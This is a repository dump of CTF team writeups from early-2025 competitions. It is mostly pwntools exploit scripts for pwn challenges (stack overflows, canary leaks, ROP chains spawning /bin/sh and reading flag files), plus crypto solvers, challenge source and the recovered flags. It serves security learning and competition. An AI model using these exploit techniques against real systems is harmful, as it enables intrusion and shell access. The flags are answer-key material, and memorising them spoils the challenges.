-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/readme_please/readme_src.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/treasure_hunt/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vuln", checksec=False) 7 | context.binary = elf 8 | 9 | ##p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("treasure-hunt.ctf.pearlctf.in", 30008) 12 | 13 | p.sendlineafter(b"proceed: ", b"whisp3ring_w00ds") 14 | p.sendlineafter(b"proceed: ", b"sc0rching_dunes") 15 | p.sendlineafter(b"proceed: ", b"eldorian_ech0") 16 | p.sendlineafter(b"proceed: ", b"shadow_4byss") 17 | 18 | p.readuntil(b"win:- ") 19 | 20 | payload = b"" 21 | payload += b"A" * 0x48 22 | payload += p64(elf.sym["setEligibility"]) 23 | payload += p64(elf.sym["winTreasure"]) 24 | p.sendline(payload) 25 | 26 | p.readuntil(b"GGs\n") 27 | 28 | print(p.readuntil(b"}").decode()) # pearl{k33p_0n_r3turning_l0l} 29 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/treasure_hunt/treasurehunt.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/treasure_hunt/treasurehunt.zip -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UTCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2641 4 | 5 | 238th place 2627 points 6 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/crypto/RSA/rsa.txt: -------------------------------------------------------------------------------- 1 | n: 21507386633439519550169998646896627263990342978145866337442653437291500212804540039826669967421406761783804525632864075787433199834243745244830254423626433057121784913173342863755047712719972310827106310978325541157116399004997956022957497614561358547338887866829687642469922480325337783646738698964794799137629074290136943475809453339879850896418933264952741717996251598299033247598332283374311388548417533241578128405412876297518744631221434811566527970724653020096586968674253730535704100196440896139791213814925799933321426996992353761056678153980682453131865332141631387947508055668987573690117314953760510812159 2 | e: 3 3 | c: 6723702102195566573155033480869753489283107574855029844328060266358539778148984297827300182772738267875181687326892460074882512254133616280539109646843128644207390959955541800567609034853 4 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/crypto/espathra-csatu-banette/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | key = open("/src/key", "rb").read() 6 | secret = open("/src/flag.txt", "r").read() 7 | cipher = AES.new(key, AES.MODE_ECB) 8 | 9 | while 1: 10 | print('Enter text to be encrypted: ', end='') 11 | x = input() 12 | chksum = sum(ord(c) for c in x) % (len(x)+1) 13 | pt = x[:chksum] + secret + x[chksum:] 14 | ct = cipher.encrypt(pad(pt.encode('utf-8'), AES.block_size)) 15 | print(hex(int.from_bytes(ct, byteorder='big'))) -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./shellcode_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b *0x40063c") 13 | p = remote("challenge.utctf.live", 9009) 14 | 15 | BSS = 0x601f00 16 | 17 | rop = ROP(elf) 18 | rop.raw(p64(BSS) * (0x48 // 8)) 19 | rop.puts(elf.got["puts"]) 20 | rop.raw(elf.sym["main"]) 21 | p.sendlineafter(b"here>: \n", rop.chain()) 22 | 23 | leak = u64(p.recv(6) + b"\x00\x00") 24 | libc.address = leak - libc.sym["puts"] 25 | #log.success(f"libc: {hex(libc.address)}") 26 | 27 | rop = ROP(libc) 28 | rop.raw(p64(BSS) * (0x48 // 8)) 29 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 30 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 31 | rop.call("system") 32 | p.sendlineafter(b"here>: \n", rop.chain()) 33 | 34 | p.sendline(b"/bin/cat /flag.txt") 35 | 36 | print(p.readuntil(b"}").decode()) # utflag{i_should_be_doing_ccdc_rn} 37 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/RETirement_plan/libc.so.6 -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/RETirement_plan/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/RETirement_plan/shellcode -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | RUN apt-get update 4 | RUN apt-get update && apt-get install -y build-essential socat libseccomp-dev 5 | 6 | ARG FLAG 7 | ARG USER 8 | ENV USER $USER 9 | ENV FLAG $FLAG 10 | 11 | WORKDIR / 12 | COPY start.sh /start.sh 13 | 14 | 15 | RUN chmod 755 /start.sh && \ 16 | echo "$FLAG" > /flag.txt && \ 17 | chown root:root /flag.txt && \ 18 | chmod 644 /flag.txt 19 | 20 | EXPOSE 9000 21 | 22 | WORKDIR / 23 | COPY chal /chal 24 | RUN chmod +x /chal 25 | 26 | CMD ["/start.sh"] 27 | -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_14_UTCTF25/pwn/secbof/chal -------------------------------------------------------------------------------- /2025_03_14_UTCTF25/pwn/secbof/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | while [ true ]; do 4 | socat -dd TCP4-LISTEN:9000,fork,reuseaddr EXEC:'/chal',pty,echo=0,rawer,iexten=0 5 | done; 6 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/README.md: -------------------------------------------------------------------------------- 1 | # Nowruz 1404 Writeups 2 | 3 | https://ctftime.org/event/2601 4 | 5 | 101st place 1225 points 6 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_rsa/EZ_RSA.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import getPrime 2 | import os 3 | 4 | flag = os.getenv("FLAG", "FMCTF{F4K3_FL49}") 5 | m = int(flag.encode().hex(), 16) 6 | 7 | p = getPrime(512) 8 | q = getPrime(512) 9 | 10 | n = p*q 11 | e = 65537 12 | c = pow(m, e, n) 13 | 14 | hint = p+q 15 | 16 | print(f"{hint = }") 17 | print(f"{n = }") 18 | print(f"{c = }") 19 | 20 | # hint = 17469292153344571442220879753705314094982989674618803961044325274734902918518047825543639089360378046111761829828690097867206972174713085299385569035446604 21 | # n = 72178676992512160441554160179592383158203955928083976740488546189244761660478121450369459709272987174826935459768807973546852656122370605905453926547673003297830819475396600384101353650933279529161854454268770358323854195264696322371766082303954604264551309576730976571309522883511488619775495703381232031179 22 | # c = 58920849369961001974878540043377399205173235403895163231084588694712964281923344842680972991777380071418111292770515352012869237864259800540355713208626735820573601770413846338478651482053989341163751620131823006414875347921150338651475973491744075397194132475674270761198474531891598902225518350430719735601 23 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/EZ_XOR.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | FLAG = os.environ.get("FLAG", "FMCTF{F4K3_FL49}").encode() 3 | key = os.urandom(7) 4 | encryptedFlag = xor(FLAG, key).hex() 5 | print(f"encryptedFlag = {encryptedFlag}") 6 | # encryptedFlag = a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95 -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | enc_flag = bytes.fromhex("a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95") 6 | 7 | key = xor(b"FMCTF{", enc_flag[:6]) + xor(b"}", enc_flag[-1:]) 8 | 9 | flag = xor(enc_flag, key) 10 | 11 | print(flag.decode()) # FMCTF{X0R_1S_L1K3_MAGIC_0x1} 12 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/crypto/ez_xor/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2601 2 | 3 | # ez xor (crypto) 4 | 5 | Welcome to your first crypto challenge! 🕵️‍♂️ This one is all about XOR, one of the simplest yet most widely used operations in cryptography. Can you uncover the hidden flag? 6 | 7 | ## Solution 8 | 9 | ```python 10 | #!/usr/bin/env python3 11 | 12 | from pwn import * 13 | 14 | enc_flag = bytes.fromhex("a850d725cb56b0de4fcb40de72a4df56a72ec06cafa75ecb41f51c95") 15 | 16 | key = xor(b"FMCTF{", enc_flag[:6]) + xor(b"}", enc_flag[-1:]) 17 | 18 | flag = xor(enc_flag, key) 19 | 20 | print(flag.decode()) # FMCTF{X0R_1S_L1K3_MAGIC_0x1} 21 | ``` 22 | 23 | ## Flag 24 | `FMCTF{X0R_1S_L1K3_MAGIC_0x1}` 25 | 26 | smiley 2025/03/15 27 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/pwn/seen_guessing/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_15_Nowruz1404/pwn/seen_guessing/chall -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/pwn/seen_guessing/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("164.92.176.247", 5002) 12 | 13 | for i in range(7): 14 | seen_addr = u64(elf.read(elf.sym["seens"] + (i*8), 8)) 15 | p.sendlineafter(b"Enter a Seen: ", elf.read(seen_addr, 0x28) + p64(elf.sym["win"])) 16 | 17 | p.readuntil(b"{") 18 | 19 | print("FMCTF" + p.readuntil(b"}").decode()) # FMCTF{db8aa102093c65b674a0c216dac7cd73} 20 | -------------------------------------------------------------------------------- /2025_03_15_Nowruz1404/pwn/seen_shop/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | 7 | p = remote("164.92.176.247", 9000) 8 | 9 | def add_to_basket(item, quantity): 10 | p.sendlineafter(b"choice: ", b"1") 11 | p.sendlineafter(b"add (1-7): ", str(item).encode()) 12 | p.sendlineafter(b"quantity: ", str(quantity).encode()) 13 | 14 | def checkout(): 15 | p.sendlineafter(b"choice: ", b"2") 16 | 17 | add_to_basket(item=7, quantity=10000000000) 18 | checkout() 19 | 20 | p.readuntil(b"oh... pole ke mirize...\n") 21 | 22 | print(p.readuntil(b"}").decode()) # FMCTF{61346013e4b1e77a2f1b3675abc62c62} 23 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/README.md: -------------------------------------------------------------------------------- 1 | # Cyber Apocalypse CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2674 4 | 5 | 1930th place 7925 points 6 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/crypto/hourcle/crypto_hourcle.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/crypto/hourcle/crypto_hourcle.zip -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/crypto/traces/crypto_traces.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/crypto/traces/crypto_traces.zip -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/pwn/quack_quack/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./quack_quack_patched", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b duckling") 11 | p = remote("94.237.55.91", 33274) 12 | 13 | payload = b"" 14 | payload += b"Quack Quack " 15 | payload = payload.rjust(0x65, b"Q") 16 | 17 | p.sendlineafter(b"Quack the Duck!\n\n> ", payload) 18 | 19 | p.readuntil(b"Quack Quack ") 20 | 21 | canary = u64(b"\x00" + p.read(7)) 22 | 23 | payload = b"" 24 | payload += b"Q" * 0x58 25 | payload += p64(canary) + p64(0) 26 | payload += p16(elf.sym["duck_attack"] & 0xffff) 27 | 28 | p.sendline(payload) 29 | 30 | p.readuntil(b"HTB{") 31 | print("HTB{" + p.readuntil(b"}").decode()) # HTB{~c4n4ry_g035_qu4ck_qu4ck~_d013ad2c60990274d4b4e73c5d6713a2} 32 | -------------------------------------------------------------------------------- /2025_03_21_CyberApocalypse25/pwn/quack_quack/pwn_quack_quack.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_CyberApocalypse25/pwn/quack_quack/pwn_quack_quack.zip -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/README.md: -------------------------------------------------------------------------------- 1 | # WolvCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2579 4 | 5 | 106th place 1784 points 6 | -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/crypto/ecb++/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/crypto/ecb++/dist.tar.gz -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/pwn/drywall/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/pwn/drywall/dist.tar.gz -------------------------------------------------------------------------------- /2025_03_21_WolvCTF25/pwn/takenote/dist.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_21_WolvCTF25/pwn/takenote/dist.tar.gz -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/README.md: -------------------------------------------------------------------------------- 1 | # SwampCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2573 4 | 5 | 259th place 658 points 6 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/crypto/rock_my_password/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from hashlib import md5, sha256, sha512 4 | 5 | flag_hash = bytes.fromhex("f600d59a5cdd245a45297079299f2fcd811a8c5461d979f09b73d21b11fbb4f899389e588745c6a9af13749eebbdc2e72336cc57ccf90953e6f9096996a58dcc") 6 | 7 | f = open("/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt", "r") 8 | 9 | for i in range(14344391): 10 | try: 11 | p = f.readline().strip().encode() 12 | except: 13 | continue 14 | 15 | if len(p) != 10: 16 | continue 17 | 18 | flag = b"swampCTF{" + p + b"}" 19 | h = flag 20 | 21 | for j in range(100): 22 | h = md5(h).digest() 23 | 24 | for j in range(100): 25 | h = sha256(h).digest() 26 | 27 | for j in range(100): 28 | h = sha512(h).digest() 29 | 30 | if h == flag_hash: 31 | print(flag.decode()) # swampCTF{secretcode} 32 | break 33 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./is_admin", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.swampctf.com", 40004) 12 | 13 | p.sendline(b"A" * 16) 14 | 15 | p.sendline(b"y") 16 | 17 | p.readuntil(b"swampCTF{") 18 | 19 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{n0t_@11_5t@ck5_gr0w_d0wn} 20 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/is_admin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/beginner_pwn_1/is_admin -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_1/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2573 2 | 3 | # beginner_pwn_1 (pwn) 4 | 5 | Are you really admin? 6 | 7 | This challenge serves as an introduction to pwn that new ctfers can use to grasp basic pwn concepts. 8 | 9 | nc chals.swampctf.com 40004 10 | 11 | ## Solution 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./is_admin", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("chals.swampctf.com", 40004) 25 | 26 | p.sendline(b"A" * 16) 27 | 28 | p.sendline(b"y") 29 | 30 | p.readuntil(b"swampCTF{") 31 | 32 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{n0t_@11_5t@ck5_gr0w_d0wn} 33 | ``` 34 | 35 | ## Flag 36 | `swampCTF{n0t_@11_5t@ck5_gr0w_d0wn}` 37 | 38 | smiley 2025/03/29 39 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/beginner_pwn_2/binary -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./binary", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.swampctf.com", 40001) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x12 15 | payload += p64(elf.sym["win"]) 16 | p.sendline(payload) 17 | 18 | p.readuntil(b"swampCTF{") 19 | 20 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{1t5_t1m3_t0_r3turn!!} 21 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/beginner_pwn_2/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2573 2 | 3 | # beginner_pwn_2 (pwn) 4 | 5 | In this challenge there is a function which is not called. Can you fix that? 6 | 7 | nc chals.swampctf.com 40001 8 | 9 | ## Analysis 10 | 11 | ```bash 12 | Arch: amd64-64-little 13 | RELRO: Partial RELRO 14 | Stack: No canary found 15 | NX: NX enabled 16 | PIE: No PIE (0x400000) 17 | ``` 18 | 19 | `main` @ `0x401228`: 20 | 21 | - Calls `gets(local_12)` 22 | 23 | `win` @ `0x401186`: 24 | 25 | - Prints the flag 26 | 27 | ## Solution 28 | 29 | 1) ret2win 30 | 31 | ```python 32 | #!/usr/bin/env python3 33 | 34 | from pwn import * 35 | 36 | #context.log_level = "debug" 37 | elf = ELF("./binary", checksec=False) 38 | context.binary = elf 39 | 40 | #p = elf.process() 41 | #p = elf.debug(gdbscript="") 42 | p = remote("chals.swampctf.com", 40001) 43 | 44 | payload = b"" 45 | payload += b"A" * 0x12 46 | payload += p64(elf.sym["win"]) 47 | p.sendline(payload) 48 | 49 | p.readuntil(b"swampCTF{") 50 | 51 | print("swampCTF{" + p.readuntil(b"}").decode()) # swampCTF{1t5_t1m3_t0_r3turn!!} 52 | ``` 53 | 54 | ## Flag 55 | `swampCTF{1t5_t1m3_t0_r3turn!!}` 56 | 57 | smiley 2025/03/29 58 | -------------------------------------------------------------------------------- /2025_03_28_SwampCTF25/pwn/oh_my_buffer/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_SwampCTF25/pwn/oh_my_buffer/binary -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/README.md: -------------------------------------------------------------------------------- 1 | # TAMU CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2681 4 | 5 | 173rd place 210 points 6 | -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/crypto/ECC/ecc.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_TAMUCTF25/crypto/ECC/ecc.tar.gz -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/pwn/debug-1/debug-1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_28_TAMUCTF25/pwn/debug-1/debug-1.tar.gz -------------------------------------------------------------------------------- /2025_03_28_TAMUCTF25/pwn/debug-1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./debug-1_patched", checksec=False) 7 | context.binary = elf 8 | context.terminal = ["tmux", "splitw", "-h"] 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("tamuctf.com", 443, ssl=True, sni="tamuctf_debug-1") 15 | 16 | p.sendlineafter(b"3: Exit\n\n", str(1).encode()) 17 | 18 | payload = b"" 19 | payload += b"A" * 0x58 20 | payload += p64(elf.sym["debug"]+1) 21 | p.sendlineafter(b"characters):\n\n", payload) 22 | 23 | p.sendlineafter(b"well :) )\n", str(1).encode()) 24 | 25 | p.readuntil(b"libc leak: ") 26 | leak = int(p.readline().decode(), 16) 27 | libc.address = leak - libc.sym["system"] 28 | 29 | rop = ROP(libc) 30 | rop.raw(b"A" * 0x68) 31 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 32 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 33 | rop.call("system") 34 | p.sendline(rop.chain()) 35 | 36 | p.sendline(b"/bin/cat flag.txt") 37 | p.readuntil(b"gigem{") 38 | print("gigem{" + p.readuntil(b"}").decode()) # gigem{d3bUg61ng_n3w_c0d3_a24dcfe3} 39 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Squ1rrel CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2708 4 | 5 | 128th place 1578 points 6 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/crypto/easy_rsa/easy_rsa.txt: -------------------------------------------------------------------------------- 1 | n: 26518484190072684543796636642573643429663718007657844401363773206659586306986264997767920520901884078894807042866105584826044096909054367742753454178100533852686155634326578229244464083405472076784252798532101323300927917033985149599262487556178538148122012479094592746981412717431260240328326665253193374956717147239124238669998383943846418315819353858592278242580832695035016713351286816376107787722262574185450560176240134182669922757134881941918668067864082251416681188295948127121973857376227427652243249227143249036846400440184395983449367274506961173876131312502878352761335998067274325965774900643209446005663 2 | e: 65537 3 | c: 14348338827461086677721392146480940700779126717642704712390609979555667316222300910938184262325989361356621355740821450291276190410903072539047611486439984853997473162360371156442125577815817328959277482760973390721183548251315381656163549044110292209833480901571843401260931970647928971053471126873192145825248657671112394111129236255144807222107062898136588067644203143226369746529685617078054235998762912294188770379463390263607054883907325356551707971088954430361996309098504380934167675525860405086306135899933171103093138346158349497350586212612442120636759620471953311221396375007425956203746772190351265066237 -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/crypto/easy_rsa/rsa_easy.py: -------------------------------------------------------------------------------- 1 | import random 2 | from sympy import nextprime, mod_inverse 3 | 4 | 5 | def gen_primes(bit_length, diff=2**32): 6 | p = nextprime(random.getrandbits(bit_length)) 7 | q = nextprime(p + random.randint(diff//2, diff)) 8 | return p, q 9 | 10 | 11 | def gen_keys(bit_length=1024): 12 | p, q = gen_primes(bit_length) 13 | n = p * q 14 | phi = (p - 1) * (q - 1) 15 | 16 | e = 65537 17 | d = mod_inverse(e, phi) 18 | 19 | return (n, e) 20 | 21 | 22 | def encrypt(message, public_key): 23 | n, e = public_key 24 | message_int = int.from_bytes(message.encode(), 'big') 25 | ciphertext = pow(message_int, e, n) 26 | return ciphertext 27 | 28 | 29 | if __name__ == "__main__": 30 | public_key = gen_keys() 31 | 32 | message = "FLAG" 33 | ciphertext = encrypt(message, public_key) 34 | 35 | f = open("easy_rsa.txt", "a") 36 | f.write(f"n: {public_key[0]} \n") 37 | f.write(f"e: {public_key[1]} \n") 38 | f.write(f"c: {ciphertext}") 39 | f.close() 40 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:24.04 AS base 2 | 3 | FROM pwn.red/jail 4 | 5 | COPY --from=base / /srv 6 | COPY deja-vu /srv/app/run 7 | COPY flag.txt /srv/app/ 8 | ENV JAIL_TIME=60 JAIL_MEM=100M JAIL_CPU=1000 9 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/deja-vu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_04_Squ1rrelCTF25/pwn/deja_vu/deja-vu -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/deja_vu/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./deja-vu", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["tmux", "splitw", "-h"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("20.84.72.194", 5000) 13 | 14 | payload = b"" 15 | payload += b"A" * 0x48 16 | payload += p64(elf.sym["win"]+5) 17 | 18 | p.sendline(payload) 19 | 20 | p.readuntil(b"squ1rrel{") 21 | print("squ1rrel{" + p.readuntil(b"}").decode()) # squ1rrel{w3v3_b33n_h3r3_b3f0r3_n0w_0nt0_b1gger_4nd_better} 22 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:24.04 AS base 2 | 3 | FROM pwn.red/jail 4 | 5 | COPY --from=base / /srv 6 | COPY prison /srv/app/run 7 | COPY flag.txt /srv/app/ 8 | ENV JAIL_TIME=60 JAIL_MEM=100M JAIL_CPU=1000 9 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./prison", checksec=False) 7 | context.binary = elf 8 | context.terminal = ["tmux", "splitw", "-h"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="b *0x00401ad3") 12 | p = remote("20.84.72.194", 5001) 13 | 14 | p.sendlineafter(b"choose your cell (1-6): ", str(-1).encode()) 15 | 16 | p.readuntil(b"cellmate is ") 17 | leak = u64(p.readline()[:-1].ljust(8, b"\x00")) 18 | buf = leak - 0x50 19 | 20 | rop = ROP(elf) 21 | rop.rdi = buf + 0x40 22 | rop.rsi = 0 23 | rop.rax = constants.SYS_execve 24 | rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 25 | payload = rop.chain() 26 | 27 | POP_RSP = 0x00000000004450f8 #: pop rsp ; ret 28 | rop = ROP(elf) 29 | rop.raw(payload.ljust(0x40, b"A")) 30 | rop.raw(b"/bin/sh\x00") 31 | rop.raw(p64(POP_RSP)) 32 | rop.raw(p64(buf)) 33 | 34 | p.sendlineafter(b"What is your name: ", rop.chain()) 35 | 36 | p.sendline(b"/bin/cat flag.txt") 37 | 38 | p.readuntil(b"squ1rrel{") 39 | print("squ1rrel{" + p.readuntil(b"}").decode()) # squ1rrel{m4n_0n_th3_rUn_fr0m_NX_pr1s0n!} 40 | -------------------------------------------------------------------------------- /2025_04_04_Squ1rrelCTF25/pwn/jail/prison: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_04_Squ1rrelCTF25/pwn/jail/prison -------------------------------------------------------------------------------- /2025_04_11_1753CTF25/README.md: -------------------------------------------------------------------------------- 1 | # 1735 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2639 4 | 5 | 393rd place 100 points 6 | -------------------------------------------------------------------------------- 